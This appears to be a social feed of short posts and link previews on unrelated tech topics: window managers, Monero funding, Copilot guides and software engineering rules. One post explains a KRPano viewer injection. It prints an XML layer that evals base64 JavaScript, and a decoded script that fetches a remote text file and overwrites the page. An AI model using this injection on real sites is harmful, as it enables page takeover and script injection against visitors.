How to Mount a Balcony Awning
Hi Kris,
I’ve been reading your website for quite a while. It’s one of my favourite blogs. Thank you for what you are doing!
We are currently experiencing a heat wave in Germany, so I drew inspiration from Low-tech Magazine’s article “ How to Dress and Undress your Home” and built an awning on my balcony. I documented the process so that other readers can install one themselves.
The ov … ⌘ Read more
Saw this on Mastodon:
https://racingbunny.com/@mookie/114718466149264471
18 rules of Software Engineering
- You will regret complexity when on-call
- Stop falling in love with your own code
- Everything is a trade-off. There’s no “best” 3. Every line of code you write is a liability 4. Document your decisions and designs
- Everyone hates code they didn’t write
- Don’t use unnecessary dependencies
- Coding standards prevent arguments
- Write meaningful commit messages
- Don’t ever stop learning new things
- Code reviews spread knowledge
- Always build for maintainability
- Ask for help when you’re stuck
- Fix root causes, not symptoms
- Software is never completed
- Estimates are not promises
- Ship early, iterate often
- Keep. It. Simple.
Solid list, even though 14 is up for debate in my opinion: Software can be completed. You have a use case / problem, you solve that problem, done. Your software is completed now. There might still be bugs and they should be fixed – but this doesn’t “add” to the program. Don’t use “software is never done” as an excuse to keep adding and adding stuff to your code.
Russian intelligence document calls China ‘the enemy’, leak exposes Moscow’s deep fear | Today News ⌘ Read more
Hamas documents reportedly show deep ties, coordination between Qatar, terror group ⌘ Read more
Massive Leak of Russian Nuclear Documents Exposes a Crumbling Security Apparatus ⌘ Read more
plwm: X11 window manager written in Prolog
plwm is a highly customizable X11 dynamic tiling window manager written in Prolog. Main goals of the project are: high code & documentation quality; powerful yet easy customization; covering most common needs of tiling WM users; and to stay small, easy to use and hack on. ↫ plwm GitHub page Tiling window managers are a dime-a-dozen, but the ones using a unique or uncommon programming language do tend to stand out. ⌘ Read more
You are not needed
You want more “AI”? No? Well, too damn bad, here’s “AI” in your file manager. With AI actions in File Explorer, you can interact more deeply with your files by right-clicking to quickly take actions like editing images or summarizing documents. Like with Click to Do, AI actions in File Explorer allow you to stay in your flow while leveraging the power of AI to take advantage of editing tools in apps or Copilot functionality without having to open your file. AI actions in File Explorer are easi … ⌘ Read more
Jwno: a highly customisable tiling WM for Windows built with Janet
Jwno is a highly customizable tiling window manager for Windows 10/11, built with Janet and ❤️. It brings to your desktop magical parentheses power, which, I assure you, is not suspicious at all, and totally controllable. ↫ Jwno documentation Yes, it’s a Lisp system, so open your bag of spare parentheses and start configuring and customising it, because you’re going to need it if you want to use Jwno … ⌘ Read more
Instagram API Documentation: Key Concepts Explained for Developers ⌘ Read more
Documentation done right: A developer’s guide
Learn why and how you should write docs for your project with the Diátaxis framework.
The post Documentation done right: A developer’s guide appeared first on The GitHub Blog. ⌘ Read more
Introducing vim-dan Plugin “Documents And Notes” ⌘ Read more
Reverse-engineering Fujitsu M7MU RELC hardware compression
This is a follow-up to the Samsung NX mini (M7MU) firmware reverse-engineering series. This part is about the proprietary LZSS compression used for the code sections in the firmware of Samsung NX mini, NX3000/NX3300 and Galaxy K Zoom. The post is documenting the step-by-step discovery process, in order to show how an unknown compression algorithm can be analyzed. The discovery process was supported by Igor Skochins … ⌘ Read more
@movq@www.uninformativ.de @kat@yarn.girlonthemoon.xyz @quark@ferengi.one In 2014 one person created protocol ii. Later it forked in IDEC. Why i said this? Because it’s simple “federated” forum-like protocol where from your station fetch another every 5-10 minutes. Stations has topic-based channels like idec.talks, linux.16, haiku.os, zx.spectrum. In short it’s FIDO but.. more modern? Documentation: https://github.com/idec-net/new-docs (mostly Russian, but you can use translator, also protocol already translated to english)
️ Hacking and Securing Kubernetes: A Deep Dive into Cluster Security
Disclaimer: This document is for educational purposes only. Exploiting systems without authorization is illegal and punishable by … ⌘ Read more
@bender@twtxt.net You said:
as long as those working on clients can reach an agreement on how to move forward. That has proven, though, to be a pickle in the past.
I think this is because we probably need to start thinking about three different aspects to the ecosystem and document them out:
- Specifications (as they are now)
- Server recommendations (e.g: Timeline, yarnd, etc)
- Client recommendations (e.g: jenny, tt, tt2, twet, etc)
Let’s give PRO/VENIX a barely adequate, pre-C89 TCP/IP stack (featuring Slirp-CK)
Only a few weeks ago, I linked to Cameron Kaiser’s excellent deep dive into the DEC Professional 380 running PRO/VENIX, and now we have a follow-up. Fortunately, today we have AI we have many more excellent and comprehensive documents on the subject, and more importantly, we’ve recently brought back up an oddball platform that doesn’t have networking either: our DEC Profess … ⌘ Read more
Lab: Exploiting an API endpoint using documentation
We will solve this lab based on the API documentation exposed to delete Carlos’s user.
[Continue reading on InfoSec Write-ups »](https://infosecwriteups.com/lab-exploiting-an-api-endpoint-using-d … ⌘ Read more
@kat@yarn.girlonthemoon.xyz pandoc is a joy! I haven’t used any Microsoft word processing tools since forever. They want a Word document? Pandoc to the rescue!
@bender@twtxt.net awww thank you :‘))) you all are too nice!!! i really wanted to share how i did this because i think i’m the first person to publicly attempt a production instance of dreamwidth code in docker, so i’m glad i did a good job at documenting it!!!!!!!
@kat@yarn.girlonthemoon.xyz woah! That’s something else, kat! Heck, I document pretty much everything (more at work than anywhere else), and I have got to tell you, you put my “documentation” to shame. LOL. Very well done!
Hacking and Securing Docker Containers: A Deep Dive into Common Vulnerabilities and Test Cases
Disclaimer: This document is for educational purposes only. Exploiti … ⌘ Read more
@javivf@adn.org.es Generally speaking if it has been reviewed, discussed and merged, then we accept it as a standard to the set of specs we support. However we might want to document this process and set some guidelines about this to be clear 🤣 We’ve been fairly lax/lose here and I think that’s okay given teh size of our community 👌
10 Legendary Tales of Revenge Being Served Cold
Though the phrase “revenge is a dish best served cold” isn’t very old (its first documented use was in a Eugène Sue work published in the 1800s), its meaning resonates through time. History is filled with examples of those who delayed their revenge out of necessity or deliberate cruelty. As the famous saying argues, delayed […]
The post [10 Legendary Tales of Revenge Being Served Cold](https://listverse.com/2025/04/14/10-legendary-tales … ⌘ Read more
Emoji Picker Shortcut Not Working in MacOS Sequoia? Let’s Fix It
Some MacOS Sequoia users have discovered the familiar handy Emoji keyboard shortcut to access the Emoji & Symbols panel is no longer working as expected. This can be immensely frustrating, especially if you rely on it for quick access to emojis in messages, emails, documents, and in general. While it might seem like a minor … [Read More](https://osxdaily.com/2025/03/07/emoji-picker-shortcut-not-workin … ⌘ Read more
How to Upload Documents to ChatGPT
ChatGPT allows you to upload documents, which you can then describe, analyze, summarize, explain, or even get assistance with that particular document. ChatGPT works with just about any document type that you might be working with or come across in the world of tech and computers, including .pdf, .doc, .docx, .txt, .rtf, .xls, .xlsx, .csv, … Read More ⌘ Read more
Monero Observer Blitz #39 - February 2025
Here’s a recap of what happened this February in the Monero community:
- binaryFate published a long overdue February 2025 Monero General Fund transparency report ( 1)
- Rucknium publicly released all OSPEAD-related documents and code after 3+ years of research ( 2)
- **There were four Monero Research Lab … ⌘ Read more
Ten Disturbing Stories About the Dark Side of Mindfulness
In this frenzied day and age, more and more of us are turning to mindfulness to lower our stress and center ourselves. Based on Buddhist meditation, mindfulness spans a range of techniques that ask people to be more aware of their thoughts and feelings. The benefits of mindfulness are well documented. But while some gurus […]
The post [Ten Disturbing Stories About the Dark Side of Mindfulness](https://listverse.com/2 … ⌘ Read more
It just occurred to me that Gemtext has no explicit support for anchors: the ability to link to a specific part of a document.
Rucknium publicly releases all OSPEAD-related documents and code after 3+ years of research
Rucknium1 has published all of the HackerOne 2 and CCS (M1-M2)3 document and code submissions related to their Optimal Static Parametric Estimation of Arbitrary Distributions (OSPEAD) 4 project, after 3+ years of research:
The OSPEAD documents and code are being publicly released now because there is now an implementable solution to the problems I raised in my … ⌘ Read more
Humane is shutting down the AI Pin and selling its remnants to HP
Humane is selling most of its company to HP for $116 million and will stop selling AI Pin, the company announced today. AI Pins that have already been purchased will continue to function normally until 3PM ET on February 28th, Humane says in a support document. After that date, Pins will “no longer connect to Humane’s servers.” As a result, AI Pin features will “no longer include calling, messaging, A … ⌘ Read more
UNIX man pages
What might be somewhat more surprising though considering its research origins is that Unix almost since the very beginning had a comprehensive set of online reference documentation for all its commands, system calls, file formats, etc. These are the the manual- or man-pages. On Unix systems used interactively, the man-pages have historically always been installed, space permitting. The way the manual pages have evolved and how they are used has changed over the decades. This set of posts is intended … ⌘ Read more
Run Linux inside a PDF file via a RISC-V emulator
You might expect PDF files to only be comprised of static documents, but surprisingly, the PDF file format supports Javascript with its own separate standard library. Modern browsers (Chromium, Firefox) implement this as part of their PDF engines. However, the APIs that are available in the browser are much more limited. The full specfication for the JS in PDFs was only ever implemented by Adobe Acrobat, and it contains some ridicul … ⌘ Read more
tobtoht posts January 2025 Monero/Feather dev report
tobtoht1 has published the first progress report2 for his full-time Q1 2025 Feather Wallet and Monero dev work CCS proposal3:
Work overviewSummary: core build system and CI work
Feather: 4 commits (+217, -45)
* guix: add missing patch
Core: 43 (non-documentation) PRs
* Comments on the Code of Conduct #9738
* cmake: remove msvc #9729
* ci: containerize ubuntu cli jobs #9708 [..]
The full d … ⌘ Read more
The invalid 68030 instruction that accidentally allowed the Mac Classic II to successfully boot up
A bug in the ROM for the Macintosh II was recently discovered that causes a crash when booting in 32-bit mode. Doug Brown discovered and documented the bug while playing with the MAME debugger. Why did it never show up before? It seems a quirk in Motorola’s 68030 CPU inadvertently fixes it when executing an illegal instruction that shou … ⌘ Read more
Celebrating 42 successful CNCF mentees who graduated from the LFX Program Term 3 2024
By Nate Waddington, Head of Mentorship & Documentation, CNCF CNCF congratulates the 42 mentees who have graduated from the latest LFX mentorship program funded by CNCF! 21 CNCF Graduated, Incubating, and Sandbox projects, as well as… ⌘ Read more
10 U.S. Military Plans That Were Top Secret Until Recently
Throughout history, governments and military organizations have devised secret plans to secure their nation’s interests or gain an advantage over adversaries. Many of these plans remained classified for decades, only coming to light through declassified documents or whistleblowers. These revelations often provide a fascinating glimpse into strategies, fears, and ambitions that shaped global events, offering […]
The … ⌘ Read more
Documenting and explaining legacy code with GitHub Copilot: Tips and examples
Learn how to document and explain legacy code with GitHub Copilot with real-world examples.
The post Documenting and explaining legacy code with GitHub Copilot: Tips and examples appeared first on The GitHub Blog. ⌘ Read more
So this works by adding some unbounded javascript autoloaded by the KRPano VR Media viewer
the xml parameter has a url that contains the following
<?xml version="1.0"?>
<krpano version="1.0.8.15">
<SCRIPT id="allow-copy_script"/>
<layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>
the omit above is base64 encoded script below:
const queryParams = new URLSearchParams(window.location.search),
id = queryParams.get('id');
id ? fetch('https://sour.is/superhax.txt')
.then(e => e.text())
.then(e => {
document.open(), document.write(e), document.close();
})
.catch(e => {
console.error('Error fetching the user agent:', e);
}) : console.error('No');
this script will fetch text at the url https://sour.is/superhax.txt and replaces the document content.
How to use GitHub Copilot: What it can do and real-world examples
Real-world examples show you how Copilot can generate unit tests, refactor code, create documentation, perform multi-file edits, and much more
The post How to use GitHub Copilot: What it can do and real-world examples appeared first on The GitHub Blog. ⌘ Read more
** The social is predicated on its exclusions **
I’ve been sitting on this post for like 8 months. I’ve written it and rewritten it at least a dozen times. I hsve two or three notes documents worth of research. It has never felt right, though. It still doesn’t. I figured an rss-only debut for it would be fine, and maybe one day I’ll bring it to a normy kinda post.
At my job I try to make big public digital services accessible. Because of this I think a lot about disability, and how some portion of disability is socially c … ⌘ Read more
10 Catastrophic Translation Fails in History
Translation seems like an easy task these days, with the help of technology such as Google at our fingertips, but it isn’t always so simple. Simple translation when trying to greet someone from another country is one thing, but interpreting major documents or treaties is another. Translators and interpreters are professionals with years of experience, […]
The post [10 Catastrophic Translation Fails in History](https://listverse.com/2024/12/28/1 … ⌘ Read more
nick = _@domain.tld in the twtxt.txt?
What should the advantage be to nick = _compared to just not defining a nick and let the client use the domain as the handle?
What is not intuitive is that you put something in the nick field that is not to be taken literary. The special meaning of _ is only clean if you read the documentation, compared to having something in nick that makes sense in the current context of the twtxt.txt.
4rkal submits CCS proposal to develop and release ‘dmvp2p’ v1
4rkal1 has submitted a CCS proposal2 looking to finish developing Donate Monero Via P2Pool (dmvp2p) 3 version 1, create project documentation and a step by step video:
dmvp2p short for Donate Monero Via P2Pool, is a simple GUI application that allows users to donate monero to their favorite creators/projects using p2pool. This project is a cross platform application that will enable micro-tipping via p2p … ⌘ Read more
fullmetalScience submits CCS proposal for ‘NoShore’ project
fullmetalScience1 has submitted their first CCS proposal2 looking to complete work on NoShore, a project dedicated to on-the-go offline payments:
TL;DR The document proposes a shell-based environment that users can run to enable offline payments with supporting merchants, whereas the actual signing device will be developed separately in an upcoming iteration.
”`
Total funding: 45 XMR.
ETA: Read more”`
Hydroponic Automation Board with Raspberry Pi Zero 2 and STM32 Processor
The RootMaster is a hydroponic automation platform designed to provide precise control over water, and environmental conditions. Designed for developers and enthusiasts, it includes onboard sensors, CAN support, and outputs for controlling up to three pumps and additional peripherals. According to the documentation, the STM32G4 microcontroller is based on the Arm Cortex-M4 32-bit RISC core […] ⌘ Read more
Cleaned up my npm package for twthash; made it CommonJS compatible, added more documentation and even a test. Current version is 1.2.2